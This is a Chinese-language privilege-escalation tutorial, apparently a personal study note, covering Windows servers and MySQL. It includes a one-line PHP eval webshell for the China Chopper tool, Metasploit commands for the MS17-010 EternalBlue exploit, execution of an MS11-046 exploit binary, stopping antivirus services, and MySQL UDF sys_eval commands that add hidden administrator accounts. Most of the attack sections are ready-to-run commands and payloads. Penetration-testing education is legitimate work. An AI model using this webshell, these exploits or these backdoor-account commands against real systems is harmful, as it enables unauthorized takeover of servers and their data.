提权基础 服务器配置(apache2为例)
-
提权本质
- 提权本质就是提升自己在服务器中的权限,获得更大的权限
-
提权分类
- 提权可以分为本地提权和远程提权、
- 提权也可以分为系统提权和第三方软件提权
-
权限配置
-
一般情况下,Web服务会给予一个特定低权限用户维护服务,避免给与过高权限
-
win2003–计算机管理–服务–Apache2.2
-
新建一个用户net user test test /add
-
使用test用户登录apache服务
-
重启服务失败(是因为当前用户没有执行apache的权限)
-
授权(之后再重新启动成功)
-
-
使用菜刀连接测试
-
使用中国菜刀工具在不同权限下执行net user username password /add 查看不同的结果
-
打开菜刀
-
在apache/htdocs目录新建一个1.php文件,写入一下内容
<?php @eval($_POST['choppper']);?>
作为一个webshell
-
菜刀–右键–添加连接(查看要连接的IP地址),密码是chopper
-
连接正常,然后右键打开虚拟终端
-
输入 net user admin password /add返回错误
-
回到服务,以本地系统账户登录,重启服务
-
再次输入net user admin password /add返回命令完成
-
-
Windows系统提权基础命令
-
获取IP地址信息
- IP地址是计算机在网络中的门牌号,用来寻找计算机的地址。同一台计算机有多个IP地址,可以有外部连接的IP地址,内部IP地址
- 在提权过程中,如果有外网IP地址,可以直接使用3389端口进行远程桌面连接。如果只有内网IP地址,可以使用LCX等程序进行端口转发进行连接登录
- Windows系统下使用ipconfig /all查看网卡信息
-
获取端口信息
- 端口是计算机与外部连接的一个接口,每一个开放的服务对应一个端口,用来进行连接
- Windows下可以使用netstat命令获取端口开放状态
- netstat -an 获取当前主机所有端口的开放情况及网络连接情况
-
获取服务信息和进程信息
- Windows系统下很多第三方软件都使用服务启动。如果使用第三方软件漏洞进行提权,必须了解服务方式开启的第三方软件
- 可以使用net start命令查看系统所开启的所有服务
- 可以使用net stop 服务名称 来关闭服务,例如杀毒软件等
- Windows系统下可以使用tasklist /svc 命令获取运行的进程名称、服务和PID
-
进程结束、用户管理命令
- 使用taskkill来结束进程,使用taskkill /?可以查看帮助
- Windows系统访问时需要有对应的用户命和密码
- 添加用户:
- net user username password /add
- 将用户加组:
- net localgroup administrator username /add
- 添加用户:
Windows提权辅助工具
-
辅助工具介绍
- Windows-Exploit-Suggester此工具将目标补丁与Microsoft漏洞数据库进行比较,以检测目标上潜在的缺失补丁
- 工具获取地址
-
辅助工具的安装
-
环境:Python2.7、安装xlrd模块
-
安装xlrd模块
- python -m pip install xlrd
-
执行 --update以获取漏洞文件
- python windows-exploit-sugggester.py --update
这里会生成一个文件2021-03-14-mssb.xls
- python windows-exploit-sugggester.py --update
-
-
辅助工具命令行介绍
- 使用-h参数获取帮助信息
- 使用-h参数获取帮助信息
-
辅助工具使用过技巧
- 查看本机补丁与漏洞文件中,可能存在的POC
- python windows-exploit-suggester.py --audit -i win7.txt -d 2021-03-14-mssb.xls(这里的win7.txt是systeminfo的导出文件)
- 查看本机补丁与漏洞文件中,可能存在的POC
Windows远程提权(以ms17-010为例)
-
远程提权
- 在授权的情况下,针对目标机器进行渗透册俄式,需要对目标进行提权。可以首先扫描系统是否存在可利用漏洞,探测是否可以利用
- 如果可以直接利用获得最高权限,那么就不需要本地提权,直接远程提权拿到最高权限
-
ms17-010介绍
- 一个安全类型的补丁,MS17-010更新修复联网Microsoft Windows中的漏洞。如果攻击者向Microsoft服务器消息块1.0(SMBv1)服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行
-
扫描探测ms17-010漏洞
-
在metasploit下直接利用ms17-010的漏洞扫描模块进行探测
- use auxiliary/scanner/smb/smb_ms17_010
- set rhosts 目标IP地址
- run
-
-
利用ms17-010漏洞提权
-
在metasploit下集成了ms17-010的漏洞利用模块
- use exploit/windows/smb/ms17-010_eternalblue
- set rhosts 目标IP地址
- set lhost 本地IP地址
- set lport 本地监听端口
- run
-
Windows本地提权(以ms11-046为例)
-
系统提权目的
- 一般情况下,系统管理员只会给与Web服务一个权限比较低的用户来运行
- 目的:利用系统漏洞来提升当前的运行权限,或者说是添加一个高权限用户
-
系统提权流程
- 获取执行cmd命令窗口,使用systeminfo查看当前系统补丁信息
- 利用工具对出没有打的补丁
- 菜刀连接,打开虚拟终端执行systeminfo
-
ms11_046提权
- 利用ms11_046提权
- 上传ms11_046的exp编译后的exe文件
- 菜刀进入目录,直接执行ms11_046.exe
- 执行后会添加一个比较高权限的用户
- 利用ms11_046提权
-
远程桌面连接
- 执行远程桌面客户端连接服务端
- win + R 输入mstsc进入远程桌面连接程序
Mysql UDF提权
-
udf介绍
-
UDF是mysql的一个拓展接口,UDF(Userdefined function)可翻译为用户自定义函数,这个是用来拓展Mysql的技术手段
-
提权过程中,经常使用mysql的udf.dll进行提权。提权之前,要上传udf.dll到指定的目录。
-
使用select @@plugin_dir;或show variables like ‘plugin%’;查看具体目录
-
修改目录方式:
- mysqld.exe --plugin-dir=具体目录
- musqld.exe --defaults-file=具体目录
- mysql.ini配置文件 plugin_dir=具体目录
-
获取当前系统的运行的数据库位数
- select @@version_compile_os;
- select @@version_compile_os;
-
-
udf.dll获取
-
sqlmap自带了对应提权使用的udf库。可以直接下载使用,但需要解密
-
kali自带sqlmap,可以获取到kali的网站根目录,然后再通过kali的网站获取
- 进入这个目录:/usr/share/sqlmap/extra/cloak
- 执行解密:./cloak.py -d -i /usr/share/sqlmap/data/udf/mysql/windows/32/lib_mysqludf_sys.dll(这个目录需要自己找)
- 移动重命名文件到/var/www/html/udf.dll
- mv lib_mysqludf_sys.dll /var/www/html/udf.dll
- 获取udf.dll
-
-
上传udf
- 将udf.dll文件上传到具体目录下
- 利用sql注入进行上传select load_file() into dumpfile “具体路径”
- 直接利用菜刀上传
-
执行提权命令
- 创建可执行系统命令的函数:create function sys_eval returns string soname ‘udf.dll’;
- 执行命令:
- select * from mysql.func where name = ‘sys_eval’;
- select sys_eval(‘dir’);
- select sys_eval(‘net user user1 123 /add’);
- select sys_eval(‘net localgroup administrators user1 /add’);
- 删除函数:drop function sys_eval;